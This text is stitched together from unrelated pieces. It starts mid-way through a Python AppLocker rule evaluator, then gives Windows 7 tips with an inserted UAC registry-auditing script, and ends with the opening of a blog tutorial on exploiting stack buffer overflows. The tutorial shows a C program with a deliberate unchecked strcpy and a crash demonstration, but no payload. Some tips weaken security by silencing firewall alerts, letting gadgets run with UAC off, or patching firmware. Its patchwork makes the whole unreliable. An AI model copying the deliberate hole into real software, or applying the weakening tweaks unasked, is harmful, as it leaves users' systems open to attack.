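    "notepad.exe": {"publisher": "O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
                    "product": "MICROSOFT WINDOWS OPERATING SYSTEM",
                    "binary": "NOTEPAD.EXE", "version": "6.1.7600.16385"},
    "vendor-tool.exe": {"publisher": "O=EXAMPLE VENDOR LTD, L=LONDON, C=GB",
                        "product": "EXAMPLE TOOL", "binary": "TOOL.EXE",
                        "version": "1.0.0.0"},
    "unsigned-game.exe": {"publisher": None, "product": None,
                          "binary": None, "version": None},
}


def version_tuple(text):
    """'6.1.7600.16385' -> (6, 1, 7600, 16385) so versions compare numerically."""
    return tuple(int(part) for part in text.split("."))


def load_publisher_rules(xml_text, collection="Exe"):
    """Read the publisher rules of one rule collection into plain dicts."""
    rules = []
    for coll in ET.fromstring(xml_text).findall("RuleCollection"):
        if coll.get("Type") != collection:
            continue
        for rule in coll.findall("FilePublisherRule"):
            cond = rule.find("Conditions/FilePublisherCondition")
            rng = cond.find("BinaryVersionRange")
            rules.append({
                "name": rule.get("Name"), "action": rule.get("Action"),
                "publisher": cond.get("PublisherName"),
                "product": cond.get("ProductName"),
                "binary": cond.get("BinaryName"),
                "low": rng.get("LowSection"), "high": rng.get("HighSection"),
            })
    return rules


def field_matches(pattern, value):
    # "*" matches anything; otherwise compare case-insensitively.
    return pattern == "*" or (value is not None and pattern.upper() == value.upper())


def rule_matches(rule, info):
    if info["publisher"] is None:      # unsigned files never satisfy a publisher rule
        return False
    if not all(field_matches(rule[k], info[k]) for k in ("publisher", "product", "binary")):
        return False
    ver = version_tuple(info["version"])
    if rule["low"] != "*" and ver < version_tuple(rule["low"]):
        return False
    if rule["high"] != "*" and ver > version_tuple(rule["high"]):
        return False
    return True


def decide(rules, info):
    """Deny rules win; once rules exist, anything not explicitly allowed is blocked."""
    if not rules:                      # a collection without rules restricts nothing
        return "Allow"
    matched = [r for r in rules if rule_matches(r, info)]
    if any(r["action"] == "Deny" for r in matched):
        return "Deny"
    return "Allow" if matched else "Deny"


def evaluate_samples():
    rules = load_publisher_rules(POLICY_XML)
    return {name: decide(rules, info) for name, info in SAMPLE_FILES.items()}


if __name__ == "__main__":
    for name, verdict in evaluate_samples().items():
        print(f"{name}: {verdict}")
```

The one Allow rule lets the signed Microsoft binary run and blocks both the other vendor's signed tool and the unsigned file, because nothing else in the Exe collection allows them.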

7. Calculate more

At first glance the Windows 7 calculator looks just like Vista's version, but explore the Mode menu and you'll see powerful new Statistics and Programmer views. And if you're clueless about bitwise manipulation, then try the Options menu instead. This offers many different unit conversions (length, weight, volume and more), date calculations (how many days between two dates?), and spreadsheet-type templates to help you calculate vehicle mileage, mortgage rates and more.

Don't take any Windows 7 applet at face value, then - there are some very powerful new features hidden in the background. Be sure to explore every option in all Windows applets to ensure you don't miss anything important.


CALCULATE MORE: The new Calculator is packed with useful features and functionality

8. Switch to a projector

Windows 7 now provides a standard way to switch your display from one monitor to another, or a projector - just press Win+P or run DisplaySwitch.exe and choose your preferred display. (This will have no effect if you've only one display connected.)

9. Get a power efficiency report

If you have a laptop, you can use the efficiency calculator to get Windows 7 to generate loads of useful information about its power consumption. Used in the right way, this can help you make huge gains in terms of battery life and performance. To do this you must open a command prompt as an administrator by typing 'cmd' in Start Search, and when the cmd icon appears, right-click it and choose Run as administrator.

Then at the command line, just type in 'powercfg -energy' (without quotes) and hit Return, and Windows 7 will scan your system looking for ways to improve power efficiency. It will then publish the results in an HTML file, usually in the System32 folder. Just follow the path it gives you to find your report.

10. Understanding System Restore

Using System Restore in previous versions of Windows has been something of a gamble. There's no way of telling which applications or drivers it might affect - you just have to try it and see.

Windows 7 is different. Right-click Computer, select Properties > System Protection > System Restore > Next, and choose the restore point you'd like to use. Click the new button to 'Scan for affected programs' and Windows will tell you which (if any) programs and drivers will be deleted or recovered by selecting this restore point. (Read our full Windows 7 System Restore tutorial.)

11. Set the time zone

System administrators will appreciate the new command line tzutil.exe utility, which lets you set a PC's time zone from scripts. If you wanted to set a PC to Greenwich Mean Time, for instance, you'd use the command

tzutil /s "gmt standard time"

The command "tzutil /g" displays the current time zone, "tzutil /l" lists all possible time zones, and "tzutil /?" displays details on how the command works.

12. Calibrate your screen

The colours you see on your screen will vary depending on your monitor, graphics cards settings, lighting and more, yet most people use the same default Windows colour profile. And that means a digital photo you think looks perfect might appear very poor to everybody else. Fortunately Windows 7 now provides a Display Colour Calibration Wizard that helps you properly set up your brightness, contrast and colour settings, and a ClearType tuner to ensure text is crisp and sharp. Click Start, type DCCW and press Enter to give it a try.

13. Clean up Live Essentials

Installing Windows Live Essentials will get you the new versions of Mail, Movie Maker, Photo Gallery and others - great. Unfortunately it also includes other components that may be unnecessary, but if you like to keep a clean system then these can be quickly removed.

If you left the default "Set your search provider" option selected during installation, for instance, Windows Live will install Choice Guard, a tool to set your browser home page and search engine, and prevent other programs from changing them. If this causes problems later, or you just decide you don't need it, then Choice Guard may be removed by clicking Start, typing msiexec /x and pressing [Enter].

Windows Live Essentials also adds an ActiveX Control to help upload your files to Windows Live SkyDrive, as well as the Windows Live Sign-in Assistant, which makes it easier to manage and switch between multiple Windows Live accounts. If you're sure you'll never need either then remove them with the Control Panel "Uninstall a Program" applet.

14. Add network support

By default Windows Live MovieMaker won't let you import files over a network, but a quick Registry tweak will change this. Run REGEDIT, browse to HKEY_CURRENT_USER\Software\Microsoft\Windows Live\Movie Maker, add a DWORD value called AllowNetworkFiles and set it to 1 to add network support.

15. Activate XP mode

If you've old but important software that no longer runs under Windows 7, then you could try using XP Mode, a virtual copy of XP that runs in a window on your Windows 7 desktop. But there's a big potential problem, as XP Mode only works with systems that have hardware virtualisation (AMD-V or Intel VT) built-in and turned on. If you've a compatible CPU then this may just be a matter of enabling the option in your BIOS set-up program, however some high profile brands, including Sony Vaio, disable the setting for "security reasons". And that blocks XP Mode from working, too.

One solution has emerged, but it's a little risky, as essentially you'll have to alter a byte in your laptop firmware and hope this doesn't have any unexpected side-effects. Gulp. If you're feeling brave then take a look at the Feature Enable Blog for the details, but don't blame us if it goes wrong.

A safer approach might be to use VirtualBox, a virtualisation tool that doesn't insist on hardware support, but then you will need to find a licensed copy of XP (or whatever other Windows version your software requires) for its virtual machine.

16. Enable virtual Wi-Fi

Windows 7 includes a little-known new feature called Virtual Wi-Fi, which effectively turns your PC or laptop into a software-based router. Any other Wi-Fi-enabled devices within range - a desktop, laptop, an iPod perhaps - will "see" you as a new network and, once logged on, immediately be able to share your internet connection.

This will only work if your wireless adapter driver supports it, though, and not all do. Check with your adapter manufacturer and make sure you've installed the very latest drivers to give you the best chance.

Once you have driver support then the easiest approach is to get a network tool that can set up virtual Wi-Fi for you. Virtual Router is free, easy to use and should have you sharing your internet connection very quickly.


If you don't mind working with the command line, though, maybe setting up some batch files or scripts, then it's not that difficult to set this up manually. See Turn your Windows 7 laptop into a wireless hotspot for more.


17. Explore God Mode

Windows 7 has changed Control Panel a little, but it's still too difficult to locate all the applets and options that you might need. God Mode, however, while not being particularly godlike, does offer an easier way to access everything you could want from a single folder.

To try this out, create a new folder and rename it to:

Everything.{ED7BA470-8E54-465E-825C-99712043E01C}

The first part, "Everything" will be the folder name, and can be whatever you want: "Super Control Panel", "Advanced", "God Mode" if you prefer.

The extension, {ED7BA470-8E54-465E-825C-99712043E01C}, must be entered exactly as it is here, though, including the curly brackets. When you press [Enter] this part of the name will disappear, and double-clicking the new folder will display shortcuts to functions in the Action Centre, the Network and Sharing Centre, Power options, troubleshooting tools, user accounts and others - more than 260 options in total.


18. Right-click everything

At first glance Windows 7 bears a striking resemblance to Vista, but there's an easy way to begin spotting the differences - just right-click things.

Right-click an empty part of the desktop, for instance, and you'll find a menu entry to set your screen resolution. No need to go browsing through the display settings any more.

Right-click the Explorer icon on the taskbar for speedy access to common system folders: Documents, Pictures, the Windows folder, and more.

And if you don't plan on using Internet Explorer then you probably won't want its icon permanently displayed on the taskbar. Right-click the icon, select 'Unpin this program from the taskbar', then go install Firefox, instead.

19. Display the old taskbar button context menu

Right-click a taskbar button, though, and you'll now see its jumplist menu. That's a useful new feature, but not much help if you want to access the minimize, maximize, or move options that used to be available. Fortunately there's an easy way to get the old context menu back - just hold down Ctrl and Shift as you right-click the taskbar button.

20. Desktop slideshow

Windows 7 comes with some very attractive new wallpapers, and it's not always easy to decide which one you like the best. So why not choose a few, and let Windows display them all in a desktop slideshow? Right-click an empty part of the desktop, select Personalise > Desktop Background, then hold down Ctrl as you click on the images you like. Choose how often you'd like the images to be changed (anything from daily to once every 10 seconds), select Shuffle if you'd like the backgrounds to appear in a random order, then click Save Changes and enjoy the show.


DESKTOP SLIDESHOW: Select multiple background images and Windows will cycle through them



21. RSS-powered wallpaper

And if a slideshow based on your standard wallpaper isn't enough, then you can always create a theme that extracts images from an RSS feed. For example, Long Zheng has created a few sample themes to illustrate how it works. Jamie Thompson takes this even further, with a theme that always displays the latest BBC news and weather on your desktop. And MakeUseOf have a quick and easy tutorial showing how RSS can get you those gorgeous Bing photographs as your wallpaper. Or you can watch our custom theme video tutorial.

22. Customise the log-on screen

Changing the Windows log-on screen used to involve some complicated and potentially dangerous hacks, but not any more - Windows 7 makes it easy.



First, browse to HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background in REGEDIT, double-click the DWORD key called OEMBackground (not there? Create it) and set its value to 1.



Now find a background image you'd like to use. Make sure it's less than 256KB in size, and matches the aspect ratio of your screen as it'll be stretched to fit.



Next, copy that image into the %windir%\system32\oobe\info\backgrounds folder (create the info\backgrounds folders if they don't exist). Rename the image to backgroundDefault.jpg, reboot, and you should now have a custom log-on image.



Alternatively, use a free tweaking tool to handle everything for you. Logon Changer displays a preview so you can see how the log-on screen will look without rebooting, while the Logon Screen Rotator accepts multiple images and will display a different one every time you log on.

23. Recover screen space

The new Windows 7 taskbar acts as one big quick launch toolbar that can hold whatever program shortcuts you like (just right-click one and select Pin To Taskbar). And that's fine, except it does consume a little more screen real estate than we'd like. Shrink it to a more manageable size by right-clicking the Start orb, then Properties > Taskbar > Use small icons > OK.

24. Enjoy a retro taskbar

Windows 7 now combines taskbar buttons in a way that saves space, but also makes it more difficult to tell at a glance whether an icon represents a running application or a shortcut. If you prefer a more traditional approach, then right-click the taskbar, select Properties, and set Taskbar Buttons to "Combine when taskbar is full". You'll now get a clear and separate button for each running application, making them much easier to identify.

25. Remove taskbar buttons

One problem with the previous tip is the buttons will gobble up valuable taskbar real estate, but you can reduce the impact of this by removing their text captions. Launch REGEDIT, browse to HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics, add a string called MinWidth, set it to 54, and reboot to see the results.

26. Restore the Quick Launch Toolbar

If you're unhappy with the new taskbar, even after shrinking it, then it only takes a moment to restore the old Quick Launch Toolbar.

Right-click the taskbar, choose Toolbars > New Toolbar, type "%UserProfile%\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch" (less the quotes) into the Folder box and click Select Folder.

Now right-click the taskbar, clear 'Lock the taskbar', and you should see the Quick Launch toolbar, probably to the right. Right-click its divider, clear Show Text and Show Title to minimise the space it takes up. Complete the job by right-clicking the bar and selecting View > Small Icons for the true retro look.

27. Custom power switch

By default, Windows 7 displays a plain text 'Shut down' button on the Start menu, but it only takes a moment to change this action to something else. If you reboot your PC a few times every day then that might make more sense as a default action: right-click the Start orb, select Properties and set the 'Power button action' to 'Restart' to make it happen.

28. Auto arrange your desktop

If your Windows 7 desktop has icons scattered everywhere then you could right-click it and select View > Auto arrange, just as in Vista. But a simpler solution is just to press and hold down F5, and Windows will automatically arrange its icons for you.

29. Disable smart window arrangement

Windows 7 features interesting new ways to intelligently arrange your windows, so that (for example) if you drag a window to the top of the screen then it will maximise. We like the new system, but if you find it distracting then it's easily disabled. Run REGEDIT, go to HKEY_CURRENT_USER\Control Panel\Desktop, set WindowArrangementActive to 0, reboot, and your windows will behave just as they always did.

30. Browse your tasks

If you prefer the keyboard over the mouse, you will love browsing the taskbar using this nifty shortcut. Press Windows and T, and you move the focus to the left-most icon on the taskbar. Then use your arrow keys to change the focus to other icons, and you get a live preview of every window.

31. Display your drives

Click Computer in Windows 7 and you might see a strange lack of drives, but don't panic, it's just Microsoft trying to be helpful: drives like memory card readers are no longer displayed if they're empty. We think it's an improvement, but if you disagree then it's easy to get your empty drives back. Launch Explorer, click Tools > Folder Options > View and clear 'Hide empty drives in the computer folder'.

32. See more detail

The new and improved Windows 7 magnifier offers a much easier way to zoom in on any area of the screen. Launch it and you can now define a scale factor and docking position, and once activated it can track your keyboard focus around the screen. Press Tab as you move around a dialog box, say, and it'll automatically zoom in on the currently active control.


33. Hiding the Windows Live Messenger icon

If you use Windows Live Messenger a lot, you'll have noticed that the icon now resides on the taskbar, where you can easily change status and quickly send an IM to someone. If you prefer to keep Windows Live Messenger in the system tray, where it's been for previous releases, just close Windows Live Messenger, edit the shortcut properties and set the application to run in Windows Vista compatibility mode.

34. Customise UAC

Windows Vista's User Account Control was a good idea in practice, but poor implementation put many people off - it raised far too many alerts. Fortunately Windows 7 displays fewer warnings by default, and lets you further fine-tune UAC to suit your preferred balance between security and a pop-up free life (Start > Control Panel > Change User Account Control Settings).

35. Use Sticky Notes

The Sticky Notes app is both simpler and more useful in Windows 7. Launch StikyNot.exe and you can type notes at the keyboard; right-click a note to change its colour; click the + sign on the note title bar to add another note; and click a note and press Alt + 4 to close the note windows (your notes are automatically saved).

36. Open folder in new process

By default Windows 7 opens folders in the same process. This saves system resources, but means one folder crash can bring down the entire shell. If your system seems unstable, or you're doing something in Explorer that regularly seems to cause crashes, then open Computer, hold down Shift, right-click on your drive and select Open in New Process. The folder will now be launched in a separate process, and so a crash is less likely to affect anything else.

37. Watch more videos

Windows Media Player 12 is a powerful program, but it still won't play all the audio and video files you'll find online. Fortunately the first freeware Windows 7 codecs package [shark007.net/win7codecs.html] has been released, and installing it could get your troublesome multimedia files playing again.

38. Preview fonts

Open the Fonts window in Windows XP and Vista and you'll see the font names, probably with icons to tell you whether they're TrueType or OpenType, but that's about it. Windows 7 sees some useful font-related improvements.

Open the new fonts window and you'll find a little preview for every font, giving you a quick idea of how they're going to look.

The tedium of scrolling through multiple entries for each family, like Times New Roman, Times New Roman Bold, Times New Roman Bold Italic and so on, has finally ended. There's now just a single entry for each font (though you can still see all other members of the family).

And there's a new OpenType font, Gabriola, added to the mix. It's an attractive script font, well worth a try the next time you need a stylish document that stands out from the crowd.

39. Restore your gadgets

Windows 7 has tightened up its security by refusing to run gadgets if UAC has been turned off, so limiting the damage malicious unsigned gadgets can do to your system. If you've disabled UAC, miss your gadgets and are happy to accept the security risk, though, there's an easy Registry way to get everything back to normal. Run REGEDIT, go to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Sidebar\Settings, create a new DWORD value called AllowElevatedProcess and set it to 1. Your gadgets should start working again right away.
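Several tips on this page change UAC-related settings: the secure-desktop prompt policy in the Vista list and the AllowElevatedProcess value just described. The following added example (not part of the original article) parses the text of a `reg export` file and reports those settings when they are in the weakened state. The EnableLUA and PromptOnSecureDesktop value names under Policies\System do not appear on this page, and the sample export is constructed.

```python
import re

# (registry key, value name, value that weakens UAC, finding text)
# EnableLUA and PromptOnSecureDesktop are the values behind the UAC on/off
# switch and the "Switch to the secure desktop" policy; they are not named
# on the page. AllowElevatedProcess is the value from the gadgets tip.
POLICY_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
SIDEBAR_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Sidebar\Settings"
CHECKS = [
    (POLICY_KEY, "EnableLUA", 0, "UAC is turned off"),
    (POLICY_KEY, "PromptOnSecureDesktop", 0,
     "elevation prompts appear on the user's desktop, not the secure desktop"),
    (SIDEBAR_KEY, "AllowElevatedProcess", 1,
     "gadgets are allowed to run even when UAC is turned off"),
]

# Constructed sample: text of a .reg export, not taken from a real machine.
# Files written by regedit are UTF-16; decode them before calling audit().
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"EnableLUA"=dword:00000001
"PromptOnSecureDesktop"=dword:00000000
"ConsentPromptBehaviorAdmin"=dword:00000005

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Sidebar\Settings]
"AllowElevatedProcess"=dword:00000001
'''

SECTION = re.compile(r"^\[(-?)(.+)\]$")
DWORD = re.compile(r'^"([^"]+)"=dword:([0-9a-fA-F]{1,8})$')


def parse_reg_dwords(text):
    """Return {(key, value name): int} for every DWORD, with names lower-cased
    because registry key and value names are case-insensitive."""
    values, key = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        section = SECTION.match(line)
        if section:
            # "[-HKEY_...]" deletes a key on import, so it carries no values.
            key = None if section.group(1) else section.group(2).lower()
            continue
        dword = DWORD.match(line)
        if dword and key is not None:
            values[(key, dword.group(1).lower())] = int(dword.group(2), 16)
    return values


def audit(text):
    """List the checked settings that are present and set to the weak value.
    A value that is absent keeps the Windows default and is not reported."""
    values = parse_reg_dwords(text)
    findings = []
    for key, name, weak, message in CHECKS:
        actual = values.get((key.lower(), name.lower()))
        if actual == weak:
            findings.append(f"{name}={actual}: {message}")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_REG):
        print(finding)
```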

40. New WordPad formats

By default WordPad will save documents in Rich Text Format, just as before. But browse the Save As Format list and you'll see you can also save (or open, actually) files in the Office 2007 .docx or OpenDocument .odt formats.

41. Protect your data

USB flash drives are convenient, portable, and very easy to lose. Which is a problem, especially if they're carrying sensitive data. Fortunately Windows 7 has the solution: encrypt your documents with an extension of Microsoft's BitLocker technology, and only someone with the password will be able to access it. Right-click your USB flash drive, select Turn on BitLocker and follow the instructions to protect your private files.




PROTECT YOUR DATA: Your USB flash drives can easily be encrypted with BitLocker

42. Minimise quickly with shake

If you have multiple windows open on your desktop and things are getting too cluttered, it used to be a time-consuming process to close them all down. In Windows 7 you can use the Aero Shake feature to minimise everything in seconds, using a cool mouse gesture. Grab the title bar of the window you wish to keep open and give it a shake, and rejoice in a clear desktop area.

43. Configure your favourite music

The Windows 7 Media Centre now comes with an option to play your favourite music, which by default creates a changing list of songs based on your ratings, how often you play them, and when they were added (it's assumed you'll prefer songs you've added in the last 30 days). If this doesn't work then you can tweak how Media Centre decides what a "favourite" tune is - click Tasks > Settings > Music > Favourite Music and configure the program to suit your needs.

44. Customise System Restore

There was very little you could do to configure System Restore in Vista, but Windows 7 improves the situation with a couple of useful setup options.

Click the Start orb, right-click Computer and select Properties > System Protection > Configure, and set the Max Usage value to a size that suits your needs (larger to hold more restore points, smaller to save disk space).

And if you don't need System Restore to save Windows settings then choose the "Only restore previous versions of files" option. Windows 7 won't back up your Registry, which means you'll squeeze more restore points and file backups into the available disk space. System Restore is much less likely to get an unbootable PC working again, though, so use this trick at your own risk.

45. Run As

Hold down Shift, right-click any program shortcut, and you'll see an option to run the program as a different user, handy if you're logged in to the kids' limited account and need to run something with higher privileges. This isn't really a new feature - Windows XP had a Run As option that did the same thing - but Microsoft stripped it out of Vista, so it's good to see it's had a change of heart.

46. Search privacy

By default Windows 7 will remember your PC search queries, and display the most recent examples when searching in Windows Explorer. If you're sharing a PC and don't want everyone to see your searches, then launch GPEDIT.MSC, go to User Configuration > Administrative Templates > Windows Components > Windows Explorer, double-click "Turn off display of recent search entries..." and click Enabled > OK.

47. Tweak PC volume

By default Windows 7 will now automatically reduce the volume of your PC's sounds whenever it detects you're making or receiving PC-based phone calls. If this proves annoying (or maybe you'd like it to turn off other sounds altogether) then you can easily change the settings accordingly. Just right-click the speaker icon in your taskbar, select Sounds > Communications, and tell Windows what you'd like it to do.

48. Rearrange the system tray

With Windows 7 we finally see system tray icons behave in a similar way to everything else on the taskbar. So if you want to rearrange them, then go right ahead, just drag and drop them into the order you like. You can even move important icons outside of the tray, drop them onto the desktop, then put them back when you no longer need to keep an eye on them.

49. Extend your battery life

Windows 7 includes new power options that will help to improve your notebook's battery life. To see them, click Start, type Power Options and click the Power Options link, then click Change Plan Settings for your current plan and select Change Advanced Settings. Expand Multimedia Settings, for instance, and you'll see a new "playing video" setting that can be set to optimise power savings rather than performance. Browse through the other settings and ensure they're set up to suit your needs.

50. Write crash dump files

Windows 7 won't create memory.dmp crash files if you've less than 25GB of free hard drive space, annoying if you've installed the Windows debugging tools and want to diagnose your crashes. You can turn this feature off, though: browse to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CrashControl, create a new DWORD value called AlwaysKeepMemoryDump, set it to 1, and the crash dump file will now always be saved.


51. Find bottlenecks

From what we've seen so far Windows 7 is already performing better than Vista, but if your PC seems sluggish then it's now much easier to uncover the bottleneck. Click Start, type RESMON and press Enter to launch the Resource Monitor, then click the CPU, Memory, Disk or Network tabs. Windows 7 will immediately show which processes are hogging the most system resources.

The CPU view is particularly useful, and provides something like a more powerful version of Task Manager. If a program has locked up, for example, then right-click its name in the list and select Analyze Process. Windows will then try to tell you why it's hanging - the program might be waiting for another process, perhaps - which could give you the information you need to fix the problem.


FIND BOTTLENECKS: Resource monitor keeps a careful eye on exactly how your PC is being used

52. Keyboard shortcuts

Windows 7 supports several useful new keyboard shortcuts.

Alt+P: Display/hide the Explorer preview pane
Windows Logo+G: Display gadgets in front of other windows
Windows Logo++ (plus key): Zoom in, where appropriate
Windows Logo+- (minus key): Zoom out, where appropriate
Windows Logo+Up: Maximise the current window
Windows Logo+Down: Minimise the current window
Windows Logo+Left: Snap to the left hand side of the screen
Windows Logo+Right: Snap to the right hand side of the screen
Windows Logo+Home: Minimise/restore everything except the current window

53. Drag and drop to the command line

When working at the command line you'll often need to access files, which usually means typing lengthy paths and hoping you've got them right. But Windows 7 offers an easier way. Simply drag and drop the file onto your command window and the full path will appear, complete with quotes and ready to be used.

This feature isn't entirely new: you could do this in Windows XP, too, but drag and drop support disappeared in Vista. There does seem to be a new Windows 7 complication, though, in that it only seems to work when you open the command prompt as a regular user. Run cmd.exe as an administrator and, while it accepts dropped files, the path doesn't appear.

54. Customise your jumplists

Right-click an icon on your taskbar, perhaps Notepad, and you'll see a jumplist menu that provides easy access to the documents you've been working on recently. But maybe there's another document that you'd like to be always available? Then drag and drop it onto the taskbar icon, and it'll be pinned to the top of the jumplist for easier access. Click the pin to the right of the file name, or right-click it and select "Unpin from this list" when you need to remove it.

55. Faster program launches

If you've launched one instance of a program but want to start another, then don't work your way back through the Start menu. It's much quicker to just hold down Shift and click on the program's icon (or middle-click it), and Windows 7 will start a new instance for you.

56. Speedy video access

Want faster access to your Videos folder? Windows 7 now lets you add it to the Start menu. Just right-click the Start orb, click Properties > Start Menu > Customize, and set the Videos option to "Display as a link". If you've a TV tuner that works with Windows 7 then you'll appreciate the new option to display the Recorded TV folder on the Start menu, too.

57. Run web searches

The Windows 7 search tool can now be easily extended to search online resources, just as long as someone creates an appropriate search connector. To add Flickr support, say, visit I Started Something, click Download the Connector, choose the Open option and watch as it's downloaded (the file is tiny, it'll only take a moment). A "Flickr Search" option will be added to your Searches folder, and you'll be able to search images from your desktop.

A multitude of other ready-made searches, such as Google and YouTube, can be downloaded from the windowsclub.com website.

58. Schedule Media Centre downloads

You can now tell Windows Media Centre to download data at a specific time, perhaps overnight, a useful way to prevent it sapping your bandwidth for the rest of the day. Launch Media Centre, go to Tasks > Settings > General > Automatic Download Options, and set the download start and stop times that you'd like it to use.

59. Multi-threaded Robocopies

Anyone who's ever used the excellent command-line robocopy tool will appreciate the new switches introduced with Windows 7. Our favourite, /MT, can improve speed by carrying out multi-threaded copies with the number of threads you specify (you can have up to 128, though that might be going a little too far). Enter robocopy /? at a command line for the full details.

60. Load IE faster

Some Internet Explorer add-ons can take a while to start, dragging down the browser's performance, but at least IE8 can now point a finger at the worst resource hogs. Click Tools > Manage Add-ons, check the Load Time in the right-hand column, and you'll immediately see which browser extensions are slowing you down.

61. An Alt+Tab alternative

You want to access one of the five Explorer windows you have open, but there are so many other programs running that Alt+Tab makes it hard to pick out what you need. The solution? Hold down the Ctrl key while you click on the Explorer icon. Windows 7 will then cycle through the Explorer windows only, a much quicker way to locate the right one. And of course this works with any application that has multiple windows open.

62. Block annoying alerts

Just like Vista, Windows 7 will display a suitably stern warning if it thinks your antivirus, firewall or other security settings are incorrect.

But unlike Vista, if you disagree then you can now turn off alerts on individual topics. If you no longer want to see warnings just because you've dared to turn off the Windows firewall, say, then click Control Panel > System and Security > Action Centre > Change Action Centre settings, clear the Network Firewall box and click OK.

63. Parallel defrags

The standard Windows 7 defragger offers a little more control than we saw in Vista, and the command line version also has some interesting new features. The /r switch will defrag multiple drives in parallel, for instance (they'll obviously need to be physically separate drives for this to be useful). The /h switch runs the defrag at a higher than normal priority, and the /u switch provides regular progress reports so you can see exactly what's going on. Enter the command

defrag /c /h /u /r

in a command window to speedily defrag a system with multiple drives, or enter defrag /? to view the new options for yourself.

64. Fix Explorer

The Windows 7 Explorer has a couple of potential annoyances. Launching Computer will no longer display system folders like Control Panel or Recycle Bin, for instance. And if you're drilling down through a complicated folder structure in the right-hand pane of Explorer, the left-hand tree won't always expand to follow what you're doing, which can make it more difficult to see exactly where you are. Fortunately there's a quick fix: click Organize > Folder and Search Options, check "Show all folders" and "Automatically expand to current folder", and click OK.

65. Faster file handling

If you hold down Shift while right-clicking a file in Explorer, then you'll find the Send To menu now includes all your main user folders: Contacts, Documents, Downloads, Music and more. Choose any of these and your file will be moved there immediately.

66. Create folder favourites

If you're regularly working on the same folder in Explorer then select it in the right-hand pane, right-click Favourites on the left-hand menu, and select Add to Favourites. It'll then appear at the bottom of the favourites list for easy one-click access later.

67. Disable hibernation

By default Windows 7 will permanently consume a chunk of your hard drive with its hibernation file, but if you never use sleep, and always turn your PC off, then this will never actually be used. To disable hibernation and recover a little hard drive space, launch REGEDIT, browse to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Power, then set both HibernateEnabled and HiberFileSizePerfect to zero.

Friday, June 11, 2010

Exploiting Stack Based Buffer Overflows

SOLDIERX.COM Presents
Exploiting Stack Based Buffer Overflows
By SOLDIERX.COM

NOBODY CAN STOP INFORMATION INSEMINATION
The author hereby grants permission to reproduce, redistribute,
or include this file(s) in your file section, electronic or print
newsletter, or any other form of transmission that you choose, as
long as it is kept intact and whole, with no omissions, deletions,
or changes. SOLDIERX.COM - http://www.soldierx.com
E-mail - root@bse.die.ms, Website - http://bse.die.ms/
By The Itch / BsE
---------------------------------------

Lately I encountered more and more articles explaining stack based
buffer overflows, and after reading some, I decided to learn how
they work too.

The stuff I explain in this article is stack based buffer overflows
on the x86 architecture. Of course, a basic knowledge of C is required,
and a minimal knowledge of assembly language as well.

I have learned exploitation of stack based buffer overflows from
the articles of Aleph1 and mixter, furthermore WildCoyote was always
willing to answer my questions.

Requirements:
1. intel/x86 machine running a flavor of linux.
2. root on that machine, or enable core dumping (ulimit -c unlimited).
3. pico (or any other text editor).
4. gdb (a very handy debugger).

It is best to begin with a basic example in C.

<-------vuln1.c---------------------------
/* Example program
* Its vulnerability is in the use of the strcpy() function
*
* Coded by The Itch / BsE
* root@bse.die.ms
* http://bse.die.ms
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[30];

    if(argc < 2)
    {
        printf("strcpy() NOT executed....\n");
        printf("Syntax: %s \n", argv[0]);
        exit(0);
    }

    /* no length check here: this is the vulnerability */
    strcpy(buffer, argv[1]);
    printf("buffer = %s\n", buffer);
    printf("strcpy() executed...\n");
    return 0;
}

/* Remember, there is no cure for BsE */

<-------vuln1.c---------------------------

The function strcpy() does not check its boundaries. That means
that it doesn't check whether argv[1] fits into buffer, and just keeps
on copying into buffer until it encounters the terminating NUL
byte (\0) of the source string.

Let's run the program.

[root@daveli whiz]# gcc vuln1.c -o vuln1
[root@daveli whiz]# ./vuln1 1234567890
buffer = 1234567890
strcpy() executed...
[root@daveli whiz]#

No problems yet, because 1234567890 easily fits into a 30 byte buffer.
(1234567890 = only 10 bytes).

The buffer works like this:

[#####################] [ebp] [eip]

[#####################] = the buffer(size)
[ebp] = the stack frame pointer
[eip] = the instruction pointer (the return address)

The Stack Pointer. The ESP register points to the top of the stack
(which is dynamic). The bottom of the stack is always located at a
fixed address. The stack grows downwards. Later on I will explain why
the Stack Pointer is interesting for us.

The Stack Frame Pointer. The register EBP is used on Intel CPUs to
store the Stack Frame Pointer (sometimes called the Base Pointer).
The first thing a procedure needs to do when it is called is to save
the old Stack Frame Pointer. After that the Stack Pointer (ESP) is
copied into EBP, which becomes the new Stack Frame Pointer. The Frame
Pointer is used to locate the local variables used in that particular
function.

The Instruction Pointer. The register EIP, also known as the return
address. As soon as the strcpy() function is called, it will save
the Instruction Pointer (EIP) onto the stack. The saved EIP will
become the return address of the strcpy() function. The Instruction
Pointer points to the next instruction the processor should execute.
(If we can overwrite that one, it is possible to execute our own
code).

[note] Memory works in multiples of 4. In our example program we
define char buffer[30]; (30 bytes) but, because memory works in
multiples of 4, 32 bytes are actually reserved for char buffer[30];

But let's continue with our program. We defined buffer as 30 bytes,
so let's test it:

[root@daveli whiz]# ./vuln1 123456789012345678901234567890
buffer = 123456789012345678901234567890
strcpy() executed...
[root@daveli whiz]#

Works perfectly. But there are actually 32 bytes reserved for buffer,
so let's test it again.

[root@daveli whiz]# ./vuln1 12345678901234567890123456789012
buffer = 12345678901234567890123456789012
strcpy() executed...
[root@daveli whiz]#

Look, that's still possible.

[root@daveli whiz]# ./vuln1 12345678901234567890123456789012AAAA
buffer = 12345678901234567890123456789012AAAA
strcpy() executed...
Segmentation fault (core dumped)
[root@daveli whiz]#

